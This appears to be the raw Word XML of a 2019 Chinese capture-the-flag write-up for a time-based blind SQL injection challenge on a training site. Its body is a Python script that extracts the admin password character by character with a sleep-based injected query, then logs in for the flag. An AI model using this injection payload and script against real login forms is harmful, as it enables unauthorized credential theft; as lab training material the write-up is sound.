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41D6" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18658776" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>/*                程序作者：爱的伊苏                        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A6FBF" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>/*                程序完成时间：2019/2/4                    */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D9680" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>/*                有任何问题请联系：740531307@qq.com        */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00339B79" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>/************************************************************/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E024CE" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t>//@永远得意的笑下去</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0E759" w14:textId="77777777" w:rsidR="004A72A4" w:rsidRDefault="004A72A4" w:rsidP="004A72A4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1780310E" w14:textId="2305DE56" w:rsidR="00E474C9" w:rsidRDefault="005317D9">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盲注题</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="332F42F0" w14:textId="3727C5C8" w:rsidR="005317D9" w:rsidRDefault="005317D9"/>
    <w:p w14:paraId="0BDB6645" w14:textId="1675B2DE" w:rsidR="005317D9" w:rsidRDefault="005317D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现admin可以正确连接到数据库，但是没有密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5BB994" w14:textId="0CEFDC06" w:rsidR="005317D9" w:rsidRDefault="005317D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接python开始跑数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D1B270" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13DA9108" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t>#-*-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>coding:utf</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-8-*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FA8A9E" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">import requests  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A49768" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">import time  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6551399C" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781C04CA" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t>payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>_.{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">}*'  #不区分大小写的  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0A188" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B71CAD3" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">flag = ""  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EFA7D" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">key=0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5C4E3A" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">print("Start")  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7931BF1D" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D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1,50):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047DB6A5" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">    if key == 1:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D49C33" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        break  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28793C93" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">    for payload in payloads:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15AA65" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9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()#记录当前时间  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3036BA1C" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        headers = {"Host": "ctf5.shiyanbar.com",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8EA0B5" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B8261C" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "Accept": "text/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339AB84B" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "Accept-Language": "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 xml:space="preserve">=0.8,en-US;q=0.5,en;q=0.3",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519CF0F5" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "Accept-Encoding": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, deflate",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD4D8F0" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1470994390,1470994954,1470995086,1471487815; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*67928%2CnickName%3Ayour",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C931699" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   "Connection": "keep-alive",  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6DA41" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                   }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7FADF3" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://ctf5.shiyanbar.com/basic/inject/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>index.php?admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=admin' and case when(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>substr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>password,%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>s,1)='%s') then sleep(10) else sleep(0) end and ''='&amp;pass=&amp;action=login" %(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i,payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)#数据库  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F414847" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        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headers=headers)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E8F27" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        if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starttime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt; 10:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5046B052" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            flag += payload  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E71BDF" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9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pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is:%</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s"%flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37250AEF" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">            break  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23215342" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">        else:  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5083DC0C" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">            if payload == '*':  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9DA6BA" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                key = 1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54121CC3" w14:textId="77777777" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">                break  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6FEFC7" w14:textId="68D8911E" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:t xml:space="preserve">print('[Finally] current </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is %s'% flag)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57441BEA" w14:textId="6AEFCF0D" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9"/>
    <w:p w14:paraId="0CE706E8" w14:textId="1600BC63" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9"/>
    <w:p w14:paraId="3547EE18" w14:textId="409C60C0" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可得到admin的密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3869EF" w14:textId="7144DAE6" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9"/>
    <w:p w14:paraId="798EAB07" w14:textId="0AED1507" w:rsidR="005317D9" w:rsidRDefault="005317D9" w:rsidP="005317D9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入用户名密码后得到flag</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00531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FC"/>
    <w:rsid w:val="001938D0"/>
    <w:rsid w:val="004A72A4"/>
    <w:rsid w:val="005317D9"/>
    <w:rsid w:val="00E474C9"/>
    <w:rsid w:val="00E6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EDB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DA45E634-84E6-4591-A441-F9B7A76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2019-02-04T01:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-04T01:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>